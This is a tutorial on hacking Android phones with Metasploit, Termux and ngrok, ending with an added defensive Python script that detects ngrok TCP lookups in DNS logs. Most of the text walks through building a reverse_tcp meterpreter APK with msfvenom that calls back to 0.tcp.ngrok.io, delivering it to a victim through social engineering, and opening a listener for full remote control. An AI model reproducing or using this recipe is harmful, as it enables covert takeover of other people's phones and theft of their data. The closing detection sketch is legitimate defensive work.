Hello guys, through this article I want to show you how you could easily gain access over an Android device using Metasploit and Ngrok in Termux.
Disclaimer: TO BE USED FOR EDUCATIONAL PURPOSE ONLY!!
So let's get started by getting to know what Metasploit is. Metasploit is the world's most used penetration testing framework, which enables you to find, exploit and validate vulnerabilities. It is developed by Rapid7 and is the most preferred framework for penetration testing.
So how does Ngrok come into the picture?
The answer is that when testing over external (WAN) networks using Metasploit, we are required to make some complex configurations such as port forwarding, having a static IP, etc. Using Ngrok you can skip these complexities.
First, download Termux from the Play Store onto your Android device.
You then need to visit Ngrok's website and sign up to get an account, then download the Linux (ARM) version on your Android phone. The file will be downloaded to your phone, and you will have an activation key in the window. We will use it later on, so don't close the tab.
Open Termux on your Android phone and type the command ls
If you don't see a folder named storage, then type the following command.
If you type the ls command again you will see a folder named storage. To open that folder type
Then go to the downloads folder by typing the command
Now if you type ls you will see all your downloads. Copy the name of the ngrok zip file and type the command
This command will unzip the file. Now move the file from downloads to the Termux home directory by typing the command
mv ngrok /$HOME
Now you would land in the Termux home directory, so you need to change the permissions of the file you just moved by typing the command
chmod +x ngrok
Now to execute the file type
Now you are required to authenticate your account. Copy the auth token from the page where you downloaded your ngrok zip file, and in Termux type the following
./ngrok authtoken (your auth token)
Now your account is authenticated and your token will be saved in a configuration file. Now turn on the hotspot of your Android device, and to run ngrok type the command
./ngrok tcp 4543
You can provide any port; I'm giving 4543. Now open a new Termux session by swiping from the left and clicking on new session. DON'T CLOSE THIS SESSION. In the new session type the command
pkg install unstable-repo
Then you need to install Metasploit by typing the command
pkg install metasploit
The next CRUCIAL step is to create a payload. To create a payload you need to understand certain keywords associated with any Metasploit payload. The keywords or parameters of our concern are LHOST and LPORT.
Here LHOST=0.tcp.ngrok.io (which you can see in the forwarding row in the ngrok session) and LPORT is 17143 (which is right next to the : )
Now to create a payload using Metasploit type the following command
msfvenom -p android/meterpreter/reverse_tcp LHOST =0.tcp.ngrok.io LPORT = 17143 R> sample.apk
The above command would create a payload application, which would be stored in the Termux home directory. To move the application to your phone storage type
mv sample.apk /storage/emulated/0/
Now we have reached the final and most important step, which is to use the Metasploit framework to gain access over the target device. To run Metasploit type
NOTE: THE NGROK SESSION MUST ALWAYS BE ONLINE THROUGHOUT THE PROCESS.
You can send the apk file to your target by any means either by social engineering or any other method.
Now in the Metasploit session type the following commands one by one
set LHOST localhost
set LPORT 4543
The above commands would be the same for everyone if you used the same port as mine. Now finally type
By this time you would be listening for connections on the specified port. Now when the target device installs the application you created, you would establish a connection with the target device and gain complete control over the target phone.
When a connection is established you would look at a screen like this
In the meterpreter session you can type the command help to show all the available options and explore the commands.
Congratulations, you have successfully learned how to hack into a target Android device over WAN using Metasploit and Ngrok.
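Seen from the defending side, an app built with LHOST set to an ngrok TCP endpoint such as 0.tcp.ngrok.io has to resolve that hostname before it can connect out, so DNS query logs are a practical place to spot it. The following detection sketch is an added example, not part of the original article; the log format, client addresses and the optional regional hostname form are constructed assumptions.

```python
import re
from collections import defaultdict

# Matches ngrok TCP tunnel endpoints such as 0.tcp.ngrok.io. The optional
# two-letter region label (e.g. 0.tcp.eu.ngrok.io) is an assumption that
# goes beyond the single hostname shown in the article.
NGROK_TCP = re.compile(r"\d+\.tcp\.(?:[a-z]{2}\.)?ngrok\.io")

# Constructed sample DNS query log: "<timestamp> <client_ip> <qtype> <qname>"
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.21 A www.example.com.
2024-05-01T10:00:05Z 10.0.0.37 A 0.tcp.ngrok.io.
2024-05-01T10:00:09Z 10.0.0.37 A 0.TCP.ngrok.io
2024-05-01T10:01:12Z 10.0.0.44 A 0.tcp.ngrok.io.example.com.
2024-05-01T10:02:30Z 10.0.0.52 AAAA 4.tcp.eu.ngrok.io.
malformed line
"""

def normalize(qname):
    """Lower-case and drop the trailing root dot so FQDN forms compare equal."""
    return qname.strip().lower().rstrip(".")

def is_ngrok_tcp(qname):
    """True only when the whole name is an ngrok TCP endpoint, so look-alike
    names that merely start with one (…ngrok.io.example.com) are not flagged."""
    return NGROK_TCP.fullmatch(normalize(qname)) is not None

def find_tunnel_lookups(log_text):
    """Return {client_ip: sorted list of ngrok TCP hostnames it resolved}."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip malformed records instead of failing the scan
        _ts, client, _qtype, qname = fields
        if is_ngrok_tcp(qname):
            hits[client].add(normalize(qname))
    return {client: sorted(names) for client, names in hits.items()}

if __name__ == "__main__":
    for client, names in find_tunnel_lookups(SAMPLE_LOG).items():
        print(f"{client} resolved ngrok TCP tunnel host(s): {', '.join(names)}")
```

A hit is only a lead, since developers also use ngrok legitimately; on a managed phone fleet it is worth correlating with recently sideloaded APKs on the same device.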